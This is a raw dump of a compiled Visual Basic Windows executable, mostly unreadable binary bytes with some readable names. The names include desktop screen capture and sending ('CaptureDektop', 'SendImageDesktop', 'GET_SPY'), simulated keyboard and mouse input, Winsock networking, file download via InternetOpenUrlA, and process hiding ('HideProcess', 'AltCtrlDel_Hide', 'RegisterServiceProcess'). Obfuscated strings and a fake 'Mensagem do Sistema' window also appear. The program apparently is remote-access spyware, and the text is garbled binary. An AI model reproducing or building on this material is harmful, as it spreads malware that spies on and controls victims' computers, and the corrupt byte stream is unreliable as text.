MZ�       ��  �       @                                   �   � �	�!�L�!This program cannot be run in DOS mode.
$       PE  L �eH        �  $  r      �!      @   @                     �    �                                p <    � �                   � �,                                          @  4   �r H                          .text   �"     $                   `.data   �"   @     (             @  �.idata     p     *             @  @.rsrc   �   �  
   8             @  @.reloc  F4   �  6   B             @  B8�A   s��;%           oleaut32.dll MSVBVM50.DLL                                                                                                                                                                                                                                                                                                                                                                                                               '  �@ �@ �@     @    �@  �@ �@ $�@ ��@ ź@ M�@ M�@ b�@ �@ �@ �@ X�@ �@       -�@ X�@ 5�@ %  ��@     ��@     �@    ��@ ��@ �@ A�@ N�@ g�@ ��@ ��@     '  ��@ �@ ��@     �@    :�@ A�@ P�@ ��@ ��@ ��@ ��@ �@ 6�@ ��@ ��@ ��@ ��@         !  ��@             @    ��@ ��@ ��@ ��@ ��@         %  ��@     ��@     P@    Z�@ a�@ p�@ ��@ ��@ }�@ ��@ ��@ 2�@ h�@ ��@                   ��@ %  W�@     _�@     �@    E�@ L�@ [�@ k�@ ��@ �@ f�@ ��@ ��@ G�@ k�@ ��@ P�@         %  ��@     ��@     @    %�@ ,�@ ;�@ Q�@ �@ |�@ �@ ��@ ��@ ��@ ��@         %  ��@     ��@     X@    j�@ q�@ ��@ ��@ �@ k�@ p�@ 3�@ ��@ !�@ ��@ ��@     %  �@     �@     �@    ��@ ��@ ��@ ��@ �@         %  ��@     ��@     �@    ��@ ��@ ��@ �@ X�@ ��@     %  ��@     ��@     @    J�@ Q�@ `�@ V�@ ��@ d�@ ��@         %  	�@     �@     X@    u�@ |�@ ��@ �@     '  �@ l�@ �@     �@    ��@ ��@ ��@ ��@ &�@ ��@ ��@ �@ �@ 
�@ ��@ 
�@     '  �*A 5+A �*A     �@ u   ��@ ��@  �@ �@ Q�@ ��@ ��@ ��@ ��@ ��@ ��@ ��@ ��@ ��@ $�@ 1�@ ��@ ��@ ��@ v�@ ��@ ��@ 7�@ S�@ o�@ o�@ |�@ ��@ ��@ ��@ ��@ \�@ r�@ �@ ��@ ��@ ��@ z�@ ��@ ��@ ;�@ W�@ s�@ ��@ �@ 4�@ 4�@ A�@ [�@ [�@ [�@ ��@ ��@ ��@ Q�@  �@ ��@ 4�@ D�@ D�@ ��@ ��@ ��@ ��@ ��@ ��@ ��@ � A �A wA wA A cA A ~A A :A �A wA A �A �	A -A �A aA qA UA �A �A fA JA �A �A �A DA �A ~A �A A �A rA 3A �A � A �"A L#A �#A �%A m&A �&A s'A �'A �)A �)A �*A �*A �*A         %  �-A     �-A     �@    �+A �+A ,A �-A �-A         /  ^/A �/A e/A     @    �.A �.A �.A �.A /A //A >/A ^/A     '  y8A 	9A �8A     H@    %0A ,0A ;0A Q0A �1A 2A '2A �6A �7A b8A r8A r8A               �:A       r=A ==A       �@A �@A .      �CA �CA     �@    �AA �AA BA QBA pBA }BA �BA �BA �BA �BA �BA �BA �BA CA UCA hCA �CA �CA �CA         &      �EA �EA     8@    NDA aDA pDA �DA �DA EA EA ,EA HEA gEA iEA wEA wEA wEA �EA �EA �EA �EA         ���@      �@  �����A      �A      �GA �GA       �JA }JA   }KA   �KA   VLA   �LA   6MA   �MA   pNA       �?     �o@  �PA     �PA   �SA     �SA   NUA   $VA   �VA 	  �WA     �WA 	  �YA     �YA   �[A �[A �[A   �]A �]A �]A �;f���?y����}�?�8�{zQ�?�D����?��+eG�?      �      �     ��@      Y@$bJ$��ڿpw�n�д�vöE�ſ�D�$]3տ�������?     @��      @qA               wA       ߍA               |�A   o�A   �A   ��A     ��A   �A ��A       j�A     q�A 	  �A     �A           ɭA       ��A               D�A           ݻA       G�A           �A ��A           ��A       v�A K�A   Q�A ��A Y�A �  ��A >      �B �B (@ @@ 7   ^�A e�A t�A ��A ��A ��A  B X B VB bB �B �B �B wB �B �B �B �B 	B 	B �B B B !B sB wB �B �B FB RB `B nB �B �B cB �B �	B 2
B 5B �B /B bB �B �B �B �B �B �B �B bB bB nB �B �B �B               �B     &      �B �B     P@    NB UB dB �B 3B eB jB ~B     .      �B �B     �@    �B B B mB �B B �B �B �B �B �B �B B B B *B ?B ?B ?B ZB zB |B |B �B     %  �B     �B     @    UB \B kB �B     %  B     !B     @@    �B �B �B $B �B �B B B       �@   @%  XB     _B     �@    �B �B �B QB           �B �B %  K#B     R#B     �@    UB \B kB {B �B �B �B �B IB �B �B �B < B � B � B ;!B �"B D#B     ,          �$B     0@    �#B $B $B E$B �$B �$B     %  �+B     ,B     h@    �%B �%B �%B N&B *+B 9+B �+B         !  F-B             �@    -B !-B 0-B F-B     '  �1B �1B �1B     �@    �-B �-B �-B F.B W.B |.B �.B �.B /B N/B _/B �/B n0B 
1B S1B `1B |1B |1B |1B |1B |1B �1B �1B �1B                        X@ 	   ^2B e2B t2B �2B �2B �2B �2B �2B �2B                 �%XsB �%�sB �%�sB �%sB �%sB �%4tB �%�rB �%TtB �% sB �%LtB �%8tB �%�sB �%�sB �%�sB �%�rB �%�rB �%�tB �%�rB �%�tB �%tB �%@sB �%�sB �%�tB �%�tB �%�sB �%�tB �%ltB �%�sB �%�sB �%0tB �%TsB �% tB �%(sB �%dtB �%�sB �%�tB �%|sB �%�tB �%`sB �%tsB �%,tB �%\sB �%tB �%HtB �%�rB �%�rB �%�rB �%�rB �%4sB �%LsB �%tB �%psB �%�tB �%�sB �%XtB �%�rB �%$sB �%�tB �%�tB �%sB �%sB �%�rB �%�tB �%(tB �%tB �%sB �%�rB �%�rB �% sB �%tB �%�tB �%�sB �%hsB �%�rB �%DtB �%�rB �%<tB �%�tB �%ttB �%sB �%�sB �%sB �%�rB �%|tB �%�sB �%HsB �%�sB �%�tB �%htB �%�sB �%�rB �%tB �%�rB �%�sB �%0sB �%�sB �%�sB �%�rB �%�rB �%�rB �%�tB �%�sB �%�sB �%�rB �%�rB �%lsB �%xtB �%�tB �%<sB �%�sB �%�rB �%�rB �%�sB �%�rB �%�rB �%8sB �%�sB �%�sB �%�sB �%PtB �%DsB �%xsB �%$tB �%�sB �%@tB �%�rB �%�rB �%�tB �%�sB �%ptB �%�sB �%`tB �%�tB �%�rB �%tB �% tB �%PsB �%,sB �%�sB �%�rB �%�sB �%dsB �%�sB �%\tB h*@ �����      0   @       =���w�AD��8ɡ�Q         entHeiProject1   630
    ��1  I�g`D��A��z�kHW�ĳ��B��f{|��A:O�3�f�� � `ӓ                                    �  �    start  B !�  lt  �  BM�      6   (   3   	         |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ Form1 . 5�"  �  	  v  �    	 |?@     ��������    �A@ �@B    �B             �(@   |?@     ��������    �@@ @B     �7              )@   |?@     ��������     @@ D@B    `�             8)@   |?@     ��������     A@ �@B    �b             p)@   |?@     ��������    `@@ �@B    x�             �)@   |?@     ��������    �A@ ,@B    ��             �)@   |?@     ��������    0@@ X@B 2   (�             *@ VB5!�*             ~              	          /@ �0  ���         �   �*@ �(@ �!@ h   j   s   t   a Project1  Project1    P   ��b� �E��F�\�O                    �                      �      ${@ l�: P   ��tȽsWD��рJHv�                                          �-      �|@ l�: P   I�g`D��A��z�kHW                
                          M      @"@ l�:  
 |?@     �@ ����    �A@ �@B     �5              ,@    �d@      ,@    ,@     ,@    ,@  �h l 0,@ DLB     �� �d@ �d@ @  4   �E@ ����        H,@ �G! �E@ �����,@ -@ -@ �,@ �,@ %-@     ,@ �+@ �!@ �!@ �!@                         �,@                                                                                                 �l$3   �� �l$��  ��� �l$��  �=� �l$��  ��� �l$��  �S  �l$��  ��     |?@     l�@ ����    �@@ �@B    ��"             �-@    \@     �-@    �-@     �-@    �-@      �-@ [B     p. \@ dN@ @  �  ,\@ ����        .@ H! <\@ ����Z.@ g.@ t.@ �.@ �.@ �.@ �.@ �.@ �.@ �.@ �.@ �.@ �.@ /@ /@ @.@ M.@     �-@ ,-@ �!@ �!@ �!@     E.@ �l$��  � �l$�  �� �l$��  �A �l$��  � �l$��  � �l$��  �j �l$��  �� �l$��  �0 �l$��  �� �l$��  �" �l$��  �Y% �l$��  �& �l$��  �o' �l$��  ��' �l$��  �) �l$��  �+ �l$��  ��,    �  |?@     ��@ �2B �"  @B �@  @B * \ A i O l E Q E B u N K h R b \ S \ P r o j e c t 1 . v b p   . v b p   j e c t 1 . v b p   p   1 . v b p   b p   b p                                                                                                                                                                                                                                                                                                                                                                                                                         4@ f     |?@     ��@ ����    �@@ �@B 
   �u             �1@     b@     �1@    �1@     �1@    �1@      �1@ pZB     p. \@ 0b@ @  P  ,\@ ����        t2@ H! <\@ ����83@ E3@ R3@ _3@ l3@ y3@ 4@ �2@ �2@ �2@ �2@ �2@ �2@ �2@ �2@ 3@ 3@ 3@ +3@ �3@ �3@ �3@ �3@ �3@ �3@ �3@ �3@ �3@ �3@ 4@     �1@ T1@ �!@ �!@ �!@ 4@     �l$��  �+ �l$��  �6 �l$��  ��> �l$��  �D �l$��  �D �l$��  ��D �l$��  �F �l$��  �dI �l$��  �wL �l$��  �*N �l$��  ��Z �l$��  �] �l$��  ��^ �l$��  �Va �l$��  �a �l$��  �j �l$��  ��t �l$��  �Bv �l$��  ��v �l$��  �z �l$��  �� �l$��  �΂ �l$��  �a� �l$��  �T� �l$��  �� �l$��  銒 �l$��  靬 �l$��  � � �l$��  �� �l$O  ���      �y@    <y@    �x@    �x@    �r@    �r@    Hr@    @n@    �h@    Th@    h@    �`@    �`@    T`@    `@    �_@    |_@    @_@    �^@    �^@    t^@    8^@    �]@    �]@    |]@     ]@    �\@    d[@    ([@    �Z@    �Z@    XZ@    Z@    �Y@    |Y@    4Y@    �X@    �X@    `X@    X@    �W@    �W@    XW@    W@    �V@    �V@    HV@    V@    �U@    �U@    LU@    U@    �T@    �T@    XT@     T@    �S@    �S@    tS@    <S@    S@    �R@    �R@    dR@    (R@    �Q@    �Q@    |Q@    @Q@     Q@    �P@    �P@    PP@    P@    �O@    �O@    �N@    �N@    �M@    8M@    �L@    �L@    �L@    DL@    L@    �K@    �I@    �I@    |I@    8I@    �H@    �H@    `H@    $H@    �G@    �G@    `G@    $G@    �F@    �F@    TF@    F@   |?@     ��@ ����    PA@ �@B    P�             �7@    0f@     �7@    �7@     �7@    �7@  �h l �8@ `SB     �� @f@ Pf@ @  4   `f@           �8@ ��pf@   @  8   �D@            9@ `G! �E@   @  <   pE@           9@ pG! �E@   @  @   �E@ ����        �9@ �G! �E@ ����@  D   xf@           ,:@ ���f@   �:@ �:@ �:@     �7@ L7@ �!@ �!@ �!@                                                                             �7@ L7@ �!@ �!@ �!@ �:@     8@ L7@ �!@ �!@ �!@                                                                                                         D8@ L7@ �!@ �!@ �!@                         �:@                                                                                                     l8@ L7@ �!@ �!@ �!@ �:@                                                                 �l$C   �k� �l$?   �� �l$7   ��     |?@     ,�@ ����    �?@ @B    ��             (;@    �D@     (;@    0;@     ,;@    0;@  �h l p<@ |[B     Ģ! �D@ �D@ @  `   �D@           �<@ `G! �D@   @  d   pE@           �<@ pG! �E@   @  h   �D@           X=@ `G! �E@   @  l   �D@           t=@ `G! �E@   @  p   �D@           �=@ `G! �E@   @  t   �D@           �=@ `G! �E@   @  x   �E@ ����        �=@ �G! �E@ ����@  |   �D@           \>@ `G! �E@   �>@ �>@ �>@ �>@ �>@ ?@ ?@ )?@ P?@ j?@ �>@ �>@ �>@ �>@ �>@ ?@ 6?@ C?@ ]?@ w?@     0;@ �:@ �!@ �!@ �!@ U?@     X;@ �:@ �!@ �!@ �!@                                                                                                         �;@ �:@ �!@ �!@ �!@ �>@     �;@ �:@ �!@ �!@ �!@ ?@     �;@ �:@ �!@ �!@ �!@ .?@     �;@ �:@ �!@ �!@ �!@ ;?@      <@ �:@ �!@ �!@ �!@                         �>@     �>@                                                                                             H<@ �:@ �!@ �!@ �!@ o?@ �l$��  �{  �l$��  ��~  �l$w   ��  �l$��  �D�  �l$��  闆  �l$��  �J�  �l$��  ��  �l$��  �`�  �l$w   ��  �l$g   �֓  �l$��  ��  �l$k   ��  �l$��  �/�  �l$��  �ҝ  �l$o   ��  �l$s   ��  �l$��  �K�  �l$_   �>�  �l$��  ���  �l${   �T�      AB �@ ����    AB �zM�d[�G�*�~�1R
    �?@              D@ 	           �:@ ����<K@             D@ $   B@ ��  ��      )@ ���� O@     L@B     D@ 
       ��  �     �)@ �����[@     `@B      D@ K       ��  �     p)@ �����h@     �@B     $D@        ��  �     ,-@ �����a@             0D@ %   �B@ ��  �     T1@ �����b@ �v@         8D@ (   4C@ T  �     �(@ �����K@     $@B     @D@        ��  �     8)@ �����h@      AB     HD@        ��  �     L7@ �����f@             XD@    �C@ ��  ��     �(@ �����h@     �@B     `D@        ��  �     �+@ ����e@             tD@    �C@ ��  ��     �)@ �����M@     4@B     |D@        ��  �     ��      �`b����x��� ��   �   D�  �  ����     h�F$J@ 0J@ PJ@ `J@ pJ@ |J@      �J@ �J@ �J@ �J@ �J@ �J@ �J@ �J@ K@ K@  K@ ,K@ B ��   ����    ��������    ʘTh      B ��   ����    ��������    ʘ`XY     B ���`@ 8_@ \]@ d]@ �T@ p]@ a@ a@  a@ �a@ �a@ �a@ �a@ �a@ �a@ �a@     �   h�Z�    ��     Msh�\�    ��    K T (�^����        �    �  |b@ |b@ �b@ �K@ �[@ �[@     ��������    � $   @ $   ʘh�Y  �F@ �b@    �f@ �J@ �J@ �J@     �d@ �d@ �d@ B ��    Project1    Form1   ClientMdl   NET modMutex    cImage  cJpeg   CrTxt   InternetState   Form2   mod_SpecialFolders  start   geral      U n k n o w n      h d g t 4 h     p햼9�K��Ww&��@��ݘ�G���=z���b� �E��F�\�O��$rW��B��iS��*O�3�f�� � `ӓTimer6  .=����h�8 +3q�C:\Arquivos de programas\DevStudio\VB\VB5.OLB   VB  E@        	   E@ DE@ XGB         �e �N�3�f�� � `ӓPicture1    Timer4  Timer1  Timer2  Timer3  :O�3�f�� � `ӓForm    Timer5                	   kernel32       RtlMoveMemory   �E@ �E@    \GB �dGB �t��hF@ � @ ����      user32     SendMessageA    8F@ DF@    hGB �pGB �t��hTF@ � @ ����      mouse_event 8F@ �F@    tGB �|GB �t��h�F@ � @ ����      GetWindowThreadProcessId    SaveFile    8F@ �F@    �GB ��GB �t��h�F@ � @ ����      keybd_event 8F@ G@    �GB ��GB �t��h$G@ � @ ����      OpenProcess �E@ TG@    �GB ��GB �t��h`G@ � @ ����      TerminateProcess    �E@ �G@    �GB ��GB �t��h�G@ � @ ����      SetCursorPos    8F@ �G@    �GB ��GB �t��h�G@ � @ ����      GetCursorPos    8F@ H@    �GB ��GB �t��h$H@ � @ ����   	   SetFocus    8F@ TH@    �GB ��GB �t��h`H@ � @ ����      GetExitCodeProcess  �E@ �H@    �GB ��GB �t��h�H@ � @ ����      gdi32      BitBlt  �H@ �H@    �GB ��GB �t��h�H@ � @ ����      shell32.dll    ShellExecuteA   I@ (I@    �GB ��GB �t��h8I@ � @ ����      GetDesktopWindow    8F@ hI@    �GB � HB �t��h|I@ � @ ����      GetDC   8F@ �I@    HB �HB �t��h�I@ � @ ����      GetSystemMetrics    8F@ �I@    HB �HB �t��h�I@ � @ ����   SendHookMsg CaptureDektop   �N�3�f�� � `ӓForm_Unload     OPEN_BMP_IMAGE  SaveImage   SAVE_FILE_JPG   Form_Load   Timer4_Timer    ConnectInternet Timer1_Timer    SendImageDesktop    GET_SPY Timer2_Timer    Timer3_Timer    Communicate Timer6_Timer    OpenFileStr Timer5_Timer    . �        4  < 1.fr D  H  L  P  T       � j f O n : � � / -                e \        GetWindowTextLengthA    8F@ �K@    HB �$HB �t��h�K@ � @ ����      GetWindowTextA  SampleHDC   8F@ �K@    (HB �0HB �t��hL@ � @ ����      FindWindowA 8F@ 8L@    4HB �<HB �t��hDL@ � @ ����      ShowWindow  8F@ tL@    @HB �HHB �t��h�L@ � @ ����      SetWindowPos    8F@ �L@    LHB �THB �t��h�L@ � @ ����   
   GetWindow   8F@ �L@    XHB �`HB �t��h�L@ � @ ����   
   GetParent   8F@ ,M@    dHB �lHB �t��h8M@ � @ ����      Kernel32.dll       RegisterServiceProcess  hM@ |M@    pHB �xHB �t��h�M@ � @ ����      ntohl                      � t g O � m � � ; 3 � � � 1                     �      #=����h�8 +3q�"=����h�8 +3q�   $N@ 4N@     AO�3�f�� � `ӓi;ٛx��D��o�/���          SetWindowLongA  8F@ �N@    |HB ��HB �t��h�N@ � @ ����      CallWindowProcA 8F@ �N@    �HB ��HB �t��h�N@ � @ ����              �     �  
     
       4 
 +0    8    �4 
 +0 
   �   �
  �  �          PostMessageA    8F@ �O@    �HB ��HB �t��h�O@ � @ ����   	   lstrlenA    �E@ �O@    �HB ��HB �t��h�O@ � @ ����      wsock32.dll    accept   P@ P@    �HB ��HB �t��hP@ � @ ����      bind     P@ HP@    �HB ��HB �t��hPP@ � @ ����      closesocket  P@ �P@    �HB ��HB �t��h�P@ � @ ����      connect  P@ �P@    �HB ��HB �t��h�P@ � @ ����      ioctlsocket  P@ �P@    �HB ��HB �t��h Q@ � @ ����      getpeername      P@ 0Q@    �HB ��HB �t��h@Q@ � @ ����      getsockname  P@ pQ@    �HB ��HB �t��h|Q@ � @ ����      getsockopt   P@ �Q@     IB �IB �t��h�Q@ � @ ����      htonl    P@ �Q@    IB �IB �t��h�Q@ � @ ����      htons    P@  R@    IB � IB �t��h(R@ � @ ����   
   inet_addr    P@ XR@    $IB �,IB �t��hdR@ � @ ����   
   inet_ntoa    P@ �R@    0IB �8IB �t��h�R@ � @ ����      listen   P@ �R@    <IB �DIB �t��h�R@ � @ ����    P@ �M@    HIB �PIB �t��hS@ � @ ����      ntohs    P@ 4S@    TIB �\IB �t��h<S@ � @ ����      recv     P@ lS@    `IB �hIB �t��htS@ � @ ����   	   recvfrom     P@ �S@    lIB �tIB �t��h�S@ � @ ����      select   P@ �S@    xIB ��IB �t��h�S@ � @ ����      send     P@ T@    �IB ��IB �t��h T@ � @ ����      sendto   P@ PT@    �IB ��IB �t��hXT@ � @ ����      setsockopt   P@ �T@    �IB ��IB �t��h�T@ � @ ����   hDC 	   shutdown     P@ �T@    �IB ��IB �t��h�T@ � @ ����      socket   P@ U@    �IB ��IB �t��hU@ � @ ����      gethostbyaddr    P@ <U@    �IB ��IB �t��hLU@ � @ ����      gethostbyname    P@ |U@    �IB ��IB �t��h�U@ � @ ����      gethostname  P@ �U@    �IB ��IB �t��h�U@ � @ ����      getservbyport    P@ �U@    �IB ��IB �t��hV@ � @ ����      getservbyname    P@ 8V@    �IB ��IB �t��hHV@ � @ ����   yO�3�f�� � `ӓ       getprotobynumber     P@ �V@    �IB �JB �t��h�V@ � @ ����      getprotobyname   P@ �V@    JB �JB �t��h�V@ � @ ����      WSAStartup   P@ W@    JB �JB �t��hW@ � @ ����      WSACleanup   P@ LW@     JB �(JB �t��hXW@ � @ ����      WSASetLastError  P@ �W@    ,JB �4JB �t��h�W@ � @ ����      WSAGetLastError  P@ �W@    8JB �@JB �t��h�W@ � @ ����      WSAIsBlocking    P@ X@    DJB �LJB �t��hX@ � @ ����      WSAUnhookBlockingHook    P@ HX@    PJB �XJB �t��h`X@ � @ ����      WSASetBlockingHook   P@ �X@    \JB �dJB �t��h�X@ � @ ����      WSACancelBlockingCall    P@ �X@    hJB �pJB �t��h�X@ � @ ����      WSAAsyncGetServByName    P@ Y@    tJB �|JB �t��h4Y@ � @ ����      WSAAsyncGetServByPort    P@ dY@    �JB ��JB �t��h|Y@ � @ ����      WSAAsyncGetProtoByName   P@ �Y@    �JB ��JB �t��h�Y@ � @ ����      WSAAsyncGetProtoByNumber     P@ �Y@    �JB ��JB �t��hZ@ � @ ����      WSAAsyncGetHostByName    P@ @Z@    �JB ��JB �t��hXZ@ � @ ����      WSAAsyncGetHostByAddr    P@ �Z@    �JB ��JB �t��h�Z@ � @ ����      WSACancelAsyncRequest    P@ �Z@    �JB ��JB �t��h�Z@ � @ ����      WSAAsyncSelect   P@ [@    �JB ��JB �t��h([@ � @ ����   
   WSARecvEx    P@ X[@    �JB ��JB �t��hd[@ � @ ����   0 (         I   ��$O@ ��������           ��9O�3�f�� � `ӓComment    � g ) M � x     �fĤ�I�x � 8<�+=����h�8 +3q�v4�GR�B��HTTi�*=����h�8 +3q�!=����h�8 +3q�Class   P�gv���3 +3oVBInternal  D\@        	       T\@ �JB         �e                  (     (         (    (   CreateCompatibleDC  �H@ �\@    �JB ��JB �t��h�\@ � @ ����      CreateDIBSection    �H@ ]@    �JB ��JB �t��h ]@ � @ ����   
   CreateDCA   Height  BitCount    DIBitsPtr   �H@ P]@    �JB �KB �t��h|]@ � @ ����      SelectObject    �H@ �]@    KB �KB �t��h�]@ � @ ����      DeleteObject    �H@ �]@    KB �KB �t��h�]@ � @ ����   	   DeleteDC    �H@ ,^@     KB �(KB �t��h8^@ � @ ����      LoadImageA  8F@ h^@    ,KB �4KB �t��ht^@ � @ ����      GetDIBColorTable    �H@ �^@    8KB �@KB �t��h�^@ � @ ����      SetDIBColorTable    �H@ �^@    DKB �LKB �t��h�^@ � @ ����   
   GetDIBits   Width   �H@ ,_@    PKB �XKB �t��h@_@ � @ ����      GetObjectA  �H@ p_@    \KB �dKB �t��h|_@ � @ ����      CreateCompatibleBitmap  �H@ �_@    hKB �pKB �t��h�_@ � @ ����      msvbvm60.dll       VarPtr  �_@ `@    tKB �|KB �t��h`@ � @ ����      SetStretchBltMode   �H@ @`@    �KB ��KB �t��hT`@ � @ ����      StretchBlt  �H@ �`@    �KB ��KB �t��h�`@ � @ ����      PlgBlt  �H@ �`@    �KB ��KB �t��h�`@ � @ ����   Class_Terminate BytesPerScanLine    Create  CopyStdPicture  0     �      FC:\WINDOWS\system32\stdole2.tlb stdole  0a@            @a@ `a@ �KB         �e �	�{2��� � 0�CopyHDC CopyPalletHDC   PaintHDC    Greyscale   Resample    Mirror  Rotate  4 �      l                                 �d� \˷N�Y��/-,ހ���n�FM�4�H���� ,     ,  �    � �	    �	               Quality SetSamplingFrequencies  Class_Initialize    �\	      4                           @       L                           @       d                                 |                                  �                                         �       �    U�                                   �                �                                �	                 ,               �	                 D    )   db@                 L      � g ) U � o        � O K 7            K I L L     �ĳ��B��f{|��A!RBXH3M�{���'I�g`D��A��z�kHWbVeYd�H��H� ��UDESATIVAR   AltCtrlDel_Hide HideProcess  @         )O�3�f�� � `ӓ   � h ) U � o        s i m      � G , ' q A n g �   "   � 9 5   m : o e � � � � � 2 � q /      � 6 , ' q A n g        � 7 , ' q A n g            
   � R H / �      � K X      � 8 , ' q A n g        � 9 , ' q A n g        � : , ' q A n g     ���0mZA��8|ݸZ    ���X�A�a�*��Y��tȽsWD��рJHv���J��ElF�]��1�N�3�f�� � `ӓLabel1  �N�3�f�� � `ӓCommand1    Command1_Click   P            � ; , ' q A n g        � < , ' q A n g        M O F F        � > , ' q A n g        � ? , ' q A n g        � H , ' q A n g �      � @ , ' q A n g        � U M      � 6 , ' q A n g        � h a � � � �      � m e � � � �      � 7 , ' q A n g        � V        � 8 , ' q A n g        "             SHGetSpecialFolderLocation  I@ �g@    �KB ��KB �t��hh@ � @ ����      SHGetPathFromIDListA    I@ <h@    �KB ��KB �t��hTh@ � @ ����      GetTempPathA    �E@ �h@    �KB ��KB �t��h�h@ � @ ����             Z   � t s P � v � � � � � � ! : , o . 2 � � P V w \ k   � n u � � ] 1 � F - B � ` � � � ^ � �      � 9 , ' q A n g        � x c $ e j � �        � v b Z � n � � �   __vbaStrFixstr     � � � � � v * ! � �        � o o N o > n d � � � � ,       �    � ~ h `        � : , ' q A n g     R   � y b ^ � x � ^ / 9 � } � � � s = U � � � � 8 % k , � 8 T ( N � � � � \ � � � � R   R   � y b ^ � x � ^ / 9 � } � � � s = U � � � � 8 % k , � 8 T ( N � � � � 0 � � � � R   R   � y b ^ � x � ^ / 9 � } � � � s = U � � � � 8 % k , � 8 T ( N � � � � 1 � � � � R   D   � y b ^ � x � ^ / 9 � } � � � s = U � � � O y 3 m � \ u , � R � � e         
     $   g N � � � F � � * � � � / I � � � '     4   � y b ^ � x � ^ / 9 � } � � � s = U � � � 8 p = g %     <   r ^ , � � ) � � . 7 � � � z � ` � � � � - ~ � � � � d Z � z        � ; , ' q A n g        � ^ h Y � l � ` �      � �   / ( k . 0 � � L      � < , ' q A n g        #      � > , ' q A n g        I E     @   � t s P � v � � � � � � ! : , o . 2 � � P V w \ k   � n u � � ]        o p e n     $   � ^ h Y � l � ` 2 \ � � � 7 & 7 � d        � t d ` o > n d � � � � ,      � I , ' q A n g     VBA5.DLL    __vbaVarCopy    __vbaVarAdd __vbaPrintFile  __vbaVarInt __vbaStrVarVal  __vbaI4Var  __vbaI4ErrVar   __vbaVarTstEq   __vbaFileClose  __vbaGet3      0 . 0 . 0 . 0   __vbaFileOpen   __vbaHresultCheck   oleaut32.dll    OleSavePictureFile  $N@ �KB __vbaFreeVarList    __vbaStrVarMove __vbaFreeObj    __vbaNew    __vbaStrCat __vbaCastObj    __vbaObjSet __vbaObjSetAddref   __vbaFreeObjList    __vbaFpI4   __vbaNew2   __vbaErrorOverflow     :      0   __vbaAryDestruct    __vbaFreeVar    __vbaVarMove    __vbaHresultCheckObj    __vbaFreeStr    __vbaStrToUnicode      2 5 5 . 2 5 5 . 2 5 5 . 2 5 5   __vbaGenerateBoundsError    __vbaLenBstr    __vbaFreeStrList    __vbaSetSystemError __vbaStrCopy    __vbaStrMove    __vbaStrToAnsi  __vbaStrUI1 __vbaOnError    __vbaAryConstruct              .       � __vbaExitProc   __vbaLenBstrB   __vbaAryUnlock  __vbaAryLock    __vbaRedim  __vbaLsetFixstrFree __vbaLsetFixstr __vbaFixstrConstruct    __vbaLbound __vbaUbound __vbaStrErrVarCopy  __vbaVarVargNofree  __vbaStrVarCopy __vbaStr2Vec    __vbaAryMove    __vbaResume __vbaStrCmp __vbaFpI2   __vbaFpR8   __vbaInStrVar   __vbaVarSub __vbaRecAnsiToUni   __vbaRecUniToAnsi   __vbaStrI2  __vbaCopyBytes  __vbaBoolVarNull    __vbaI2I4      CreateMutexA                        �E@  r@    �KB ��KB �t��hHr@ � @ ����      WaitForSingleObject �E@ xr@    �KB ��KB �t��h�r@ � @ ����      CloseHandle �E@ �r@    �KB ��KB �t��h�r@ � @ ����      - M U T E X -      D I S P L A Y                                              __vbaLateIdCallLd   __vbaFpUI1  __vbaPowerR8                                              "   B a d   H u f f m a n   T a b l e                                    @       ,   B a d   Q u a n t i z a t i o n   T a b l e                  @       ,   I n v a l i d   S a m p l i n g   V a l u e                                         @       ,   I l l e g a l   C o m m e n t   L e n g t h     P   I l l e g a l   p r e c i s s i o n   i n   Q u a n t i z a t i o n   T a b l e                         @       $   J P E G   E n c o d e r   C l a s s     T   W r i t t e n   b y   J o h n   K o r e j w a   < k o r e j w a @ t i a c . n e t >     r   V i s u a l   B a s i c   s o u r c e c o d e   a v a i l a b l e   a t   p l a n e t s o u r c e c o d e . c o m                  s����    (         __vbaErase  __vbaPutOwner3  __vbaRedimPreserve  __vbaFPInt  __vbaUI1I2  __vbaVarDup __vbaUI1I4  __vbaUI1Var      $ ( ! % & '   f  * + = , - ) . / \ 0 1 2 3 4 5 6 7 8 9 : ; < > ? @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ ] ^ _ ` a b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~ � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � � �   __vbaVarTstNe      wininet.dll    InternetOpenUrlA    �x@ �x@    �KB ��KB �t��h�x@ � @ ����      InternetOpenA   �x@ �x@     LB �LB �t��h�x@ � @ ����      InternetReadFile    �x@ (y@    LB �LB �t��h<y@ � @ ����      InternetCloseHandle �x@ ly@    LB � LB �t��h�y@ � @ ����      V B T a g E d i t   �N�3�f�� � `ӓ   \   __vbaVarTstGt   __vbaInStr     � t ` X � 5 � � @      � | b O � 5 � � >   2   � k s _ � 5 � � / � � � + 0 \ k * o � � ; J , ( e   (   2 � b � P � = � A _ M � � � f � � � � �        . e x e          N A M E =        � o m > { [     0   x S N \ | 1 { ~ � � � � � � � Y � L � � � * W �        � x n U � k � b     __vbaEnd    ��1 ��b� �E��F�\�Op햼9�K��Ww&��@:O�3�f�� � `ӓ                                    /  9     Form1  Form1  B $ Form1 . 5!  �  �  &  �!    Timer6  �  �
  t  �!    Timer5  �  �  t  �!    Timer4  `�  �
  �   �!    Timer3  �  �
  �  �    Timer2 d   �  �  �!    Timer1  �  	  �   �%    Picture1      C�   b #����1 ��tȽsWD��рJHv����0mZA��8|ݸZ:O�3�f�� � `ӓ                                    �-  �    Form2   Mensagem do Sistema  B "#>  lt  6             �  &        (    (       @         �                        �  �   �� �   � � ��  ��� ���   �  �   �� �   � � ��  ���                                 �����������������wwwwwwwwwwwwww������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������wwwwwwwwwwwwww��DDDDDDDDD@    ��DDDDDDDDDGpwp��DDDDDDDDDGpwp��DDDDDDDDDDDDDD��wwwwwwwwwwwwww�����������������                                ����                                                                                                                    ��������(                �                         �  �   �� �   � � ��  ��� ���   �  �   �� �   � � ��  ���                 �������������������������������������������������������������������������DDD�����DDDDDD��wwwwww���������        ��                                                          ��  $ Form2 & ' 5�  1  �  p  =���'   Picture1     ��'  lt  �'            �  f       (  N         �  v        �         h  �      h  ."  (    